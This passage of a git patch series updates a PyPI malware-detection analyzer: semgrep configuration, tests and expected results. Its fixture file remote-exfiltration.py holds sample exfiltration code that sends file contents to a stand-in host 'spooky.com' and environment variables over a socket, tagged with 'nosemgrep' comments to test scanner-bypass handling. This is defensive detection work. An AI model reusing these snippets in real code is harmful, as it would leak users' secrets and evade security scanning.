"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + 
"file": "obfuscation/decode_and_execute.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 38, "end": 38 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 47, "end": 47 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 67, "end": 67 } ], "src.macaron.resources.pypi_malware_rules.inline-imports": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 38, "end": 38 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 44, "end": 44 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 49, "end": 49 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 50, "end": 50 
}, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 51, "end": 51 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 52, "end": 52 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 53, "end": 53 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 54, "end": 54 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 56, "end": 56 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 57, "end": 57 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 58, "end": 58 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 59, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + 
"file": "obfuscation/default_assigning.py", "start": 60, "end": 60 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 61, "end": 61 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 69, "end": 69 } ], "src.macaron.resources.pypi_malware_rules.default-assigning": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 62, "end": 62 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 23, "end": 23 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 24, "end": 24 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 25, "end": 25 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 26, "end": 26 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 27, "end": 27 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 28, "end": 28 }, { - "file": 
"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 29, "end": 29 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 30, "end": 30 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 31, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 32, "end": 32 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 34, "end": 34 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 35, "end": 35 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 36, "end": 36 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 37, "end": 37 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": 
"obfuscation/default_assigning.py", "start": 38, "end": 38 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 39, "end": 39 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 40, "end": 40 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 41, "end": 41 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 42, "end": 42 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 43, "end": 43 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 44, "end": 44 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 45, "end": 45 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 46, "end": 46 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 47, "end": 47 }, { - "file": 
"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 48, "end": 48 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 49, "end": 49 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 50, "end": 50 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 51, "end": 51 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 52, "end": 52 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 53, "end": 53 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 54, "end": 54 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 56, "end": 56 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": 
"obfuscation/default_assigning.py", "start": 57, "end": 57 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 58, "end": 58 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 59, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 60, "end": 60 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 61, "end": 61 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 68, "end": 68 } ], "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 23, "end": 23 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 25, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 26, "end": 26 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 27, "end": 27 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": 
"obfuscation/tools.py", "start": 28, "end": 28 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 30, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 37, "end": 37 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 39, "end": 45 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 40, "end": 40 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 41, "end": 41 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 42, "end": 42 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 44, "end": 45 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 47, "end": 47 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 51, "end": 51 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + 
"file": "obfuscation/tools.py", "start": 53, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 54, "end": 54 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 56, "end": 56 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 58, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 61, "end": 61 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 65, "end": 65 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 68, "end": 68 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 68, "end": 68 } From f2065be8678ec2e2262f1e6bff1071e65d471bd2 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Feb 2025 15:24:25 +1000 Subject: [PATCH 14/37] fix: semgrep now only runs open-source functionality, and disabled the nosemgrep feature --- .../sourcecode/pypi_sourcecode_analyzer.py | 43 ++++++++++++------- .../exfiltration/remote-exfiltration.py | 14 +++--- 2 files changed, 35 insertions(+), 22 deletions(-) diff --git 
a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 808f5e568..a7924f98a 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -33,23 +33,29 @@ class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. - This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files - in the source code, looking for suspicious patterns defined by the YAML file in defaults.ini. By default, this - will include suspicious package imports, suspicious hardcoded constants, and suspicious function calls. If this - scan does not find any suspicious activity, the analysis will stop and the package will be marked as benign - by this analyzer. If the scan does find suspicious activity, the analyzer will move on to the second phase. - - In the second phase, the analyzer will perform dataflow analysis. This will track the flow of suspicious constants - and the results of suspicious function calls to where they are used, to determine if they are used in a malicious - manner. Suspicious activity includes data exfiltration, code execution, remote connections, operating system and - process manipulation, and encoded and obfuscated patterns. The types of activity, and their severity and quantity, - will then determine the probability of the package being malicious. - - Currently, this analyzer only supports the first phase, and will return simply boolean results on the maliciousness - of the package. + Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of + Semgrep. 
Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default + rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional + rules stored in a specified directory passed by them in the 'defaults.ini' configuration file. """ def __init__(self, resources_path: str | None = None) -> None: + """ + Initialise the source code analyzer and load default and custom semgrep rulesets. + + Parameters + ---------- + resources_path: str | None + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. If None is provided, then this is loaded from the global config resources path. + Defaults to None + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ super().__init__( name="anomalous_version_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, @@ -65,6 +71,12 @@ def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: Semgrep validation is run on the custom rules provided by the user. + Parameters + ---------- + resources_path: str + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. + Returns ------- tuple[str, str | None] @@ -140,7 +152,8 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes if there is no source code available. 
""" analysis_result: defaultdict = defaultdict(list) - semgrep_commands: list[str] = ["semgrep", "scan"] + # only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan + semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] result: HeuristicResult = HeuristicResult.PASS source_code_path = pypi_package_json.package_sourcecode_path diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py index 2ab4a9e14..e2602ef1f 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py @@ -41,10 +41,10 @@ def file_exfil_to_urllib3(): http = man().request http('POST', "spooky.com", body=oo.read(file, 2048)) - def environ_to_socket(): - import socket as s - from os import environ as environment_vars - with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: - soc.connect(('localhost', 0)) - other = soc - other.send(environment_vars) + def environ_to_socket(): # nosemgrep + import socket as s # nosemsemgrep + from os import environ as environment_vars # nosemgrep + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep + soc.connect(('localhost', 0)) # nosemgrep + other = soc # nosemgrep + other.send(environment_vars) # nosemgrep From 262f39595060a8ec401fcdd5c4a9ff64216abe8e Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 11 Feb 2025 15:06:04 +1000 Subject: [PATCH 15/37] test: added experimental feature to main malware check, tests updated to use MACARON_PATH --- .../pypi/test_pypi_sourcecode_analyzer.py | 18 ++++++------ .../test_detect_malicious_metadata_check.py | 28 ++++++++++++++----- 2 files changed, 31 insertions(+), 15 deletions(-) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py 
b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 658c8cd59..3fb423e46 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -8,11 +8,13 @@ import pytest -import macaron +from macaron import MACARON_PATH from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +RESOURCES_PATH = os.path.join(MACARON_PATH, "resources") + def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" @@ -25,7 +27,7 @@ def test_no_defaults_section(mock_defaults: MagicMock) -> None: """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" mock_defaults.has_section.side_effect = lambda _: False with pytest.raises(ConfigurationError): - _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) @patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") @@ -33,14 +35,14 @@ def test_no_custom_path(mock_defaults: MagicMock) -> None: """Test for when a default path isn't provided, so the custom rule path should be None.""" mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" mock_defaults.__getitem__.side_effect = lambda _: (MagicMock(get=MagicMock(return_value=None))) - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) assert analyzer.custom_rule_path is None mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" mock_defaults.__getitem__.side_effect = lambda section: ( 
MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) ) - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) assert analyzer.custom_rule_path is None @@ -52,7 +54,7 @@ def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: MagicMock(get=MagicMock(return_value="some_random_path" if section == "heuristic.pypi" else None)) ) with pytest.raises(ConfigurationError): - _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) @patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") @@ -64,12 +66,12 @@ def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: MagicMock(get=MagicMock(return_value=os.path.abspath(__file__) if section == "heuristic.pypi" else None)) ) with pytest.raises(ConfigurationError): - _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) pypi_package_json.package_sourcecode_path = "" @@ -103,7 +105,7 @@ def test_rules( MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) ) - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) pypi_package_json.package_sourcecode_path = sample_path analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) diff --git 
a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 15caf3249..3d84ee310 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -7,10 +7,12 @@ import os import urllib.parse from pathlib import Path +from unittest.mock import MagicMock, patch import pytest from pytest_httpserver import HTTPServer +from macaron import MACARON_PATH from macaron.config.defaults import load_defaults from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.checks.check_result import CheckResultType @@ -22,21 +24,29 @@ RESOURCE_PATH = Path(__file__).parent.joinpath("resources") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected"), + ("purl", "expected", "experimental"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV # knowledge base, it would report the package as malware. However, we intentionally block unit tests # from reaching the network. - ("pkg:pypi/zlibxjson", CheckResultType.PASSED), - ("pkg:pypi/test", CheckResultType.UNKNOWN), - ("pkg:maven:test/test", CheckResultType.UNKNOWN), + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, False, id="test_malicious_pypi_package"), + pytest.param("pkg:pypi/test", CheckResultType.UNKNOWN, False, id="test_unknown_pypi_package"), + pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), + # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving + # the issue of this false negative. 
+ pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), ], ) -def test_detect_malicious_metadata( - httpserver: HTTPServer, tmp_path: Path, macaron_path: Path, purl: str, expected: str -) -> None: +def test_detect_malicious_metadata(mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + experimental: bool) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -44,6 +54,10 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] + if experimental: + ctx.dynamic_data["analyze_source"] = True + + mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") # Set up responses of PyPI endpoints using the httpserver plugin. with open(os.path.join(RESOURCE_PATH, "pypi_files", "zlibxjson.html"), encoding="utf8") as page: From 5c9a988df91b3eb361a2373c420fa9eb7d3a1381 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 12 Feb 2025 10:23:10 +1000 Subject: [PATCH 16/37] chore: updated pre-commit hook to only consider tracked files --- scripts/dev_scripts/samples_permissions_checker.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh index 7f3d9604f..dc92366f0 100755 --- a/scripts/dev_scripts/samples_permissions_checker.sh +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -12,7 +12,7 @@ MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. 
&& pwd)" SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" # any files have any of the executable bits set -executables=$(find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x) +executables=$( ( find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x | sed "s|$MACARON_DIR/||"; git ls-files "$SAMPLES_PATH" --full-name) | sort | uniq -d) if [ -n "$executables" ]; then echo "The following files should not have any executable permissions:" echo "$executables" From 3b035f606ea3fa42fc7b12e818eaa03b5d26d46f Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 12 Feb 2025 13:43:42 +1000 Subject: [PATCH 17/37] chore: added oss only to semgrep validate --- .../pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index a7924f98a..c742cf2b1 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -115,7 +115,7 @@ def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: 